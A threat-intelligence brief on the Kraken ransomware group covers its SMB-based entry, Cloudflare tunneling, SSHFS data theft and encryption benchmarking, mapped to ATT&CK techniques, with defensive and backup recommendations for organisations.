Kraken ransomware uses benchmarking to optimize big-game attacks

Kraken ransomware introduces a novel benchmarking phase in its attack chain, measuring how quickly victim systems can process encryption workloads before locking files, and mapping closely to ATT&CK techniques like T1133 (External Remote Services), T1021.001 (RDP), T1486 (Data Encrypted for Impact) and T1041 (Exfiltration Over C2 Channel). Emerging from the remnants of the HelloKitty cartel, this Russian-speaking operation has conducted big-game hunting campaigns across Windows, Linux and VMware ESXi environments. Cisco Talos observed Kraken abusing exposed SMB services for initial access, then using Cloudflare-based tunneling for persistence and SSHFS for data theft before launching the encryptor. The benchmarking step allows Kraken actors to adapt encryption strategy to the underlying hardware and workload, selecting parameters that maximize damage while minimizing the risk of system instability or noisy performance anomalies that could expose the attack. Multi-threaded modules target SQL databases, network shares, local drives and virtual machines in parallel, while exfiltrated data is staged for double extortion on a leak site branded with references to HelloKitty and a new forum called The Last Haven Board. Ransoms reportedly reach around one million dollars in Bitcoin, with victims across the United States, the United Kingdom, Canada, Denmark, Panama and Kuwait. For businesses, Kraken exemplifies how ransomware groups are optimizing not only initial access but also the impact phase, tuning encryption to complete quickly and reliably across hybrid environments. That increases the chance of complete operational disruption while maintaining leverage through stolen data, intensifying regulatory exposure under GDPR, HIPAA or sectoral rules when sensitive customer or health records are involved. The overlap with HelloKitty also suggests that experienced operators and tooling are being recycled into the new brand, shortening the maturation cycle for Kraken as a major ransomware player. Mitigation strategies should prioritize closing external SMB and RDP exposure, enforcing strong authentication and lockout policies on any remaining remote services, and hardening backup strategies against tampering. Detection teams should look for anomalous use of Cloudflare tunnels, SSHFS-based file system access and benchmarking-like activity preceding unusual file access spikes, aligned with techniques such as T1046 (Network Service Discovery), T1021.001 and T1486. Organizations should also maintain offline and immutable backups, test restore procedures regularly and prepare communication and legal workflows for double extortion scenarios where data theft and encryption occur together.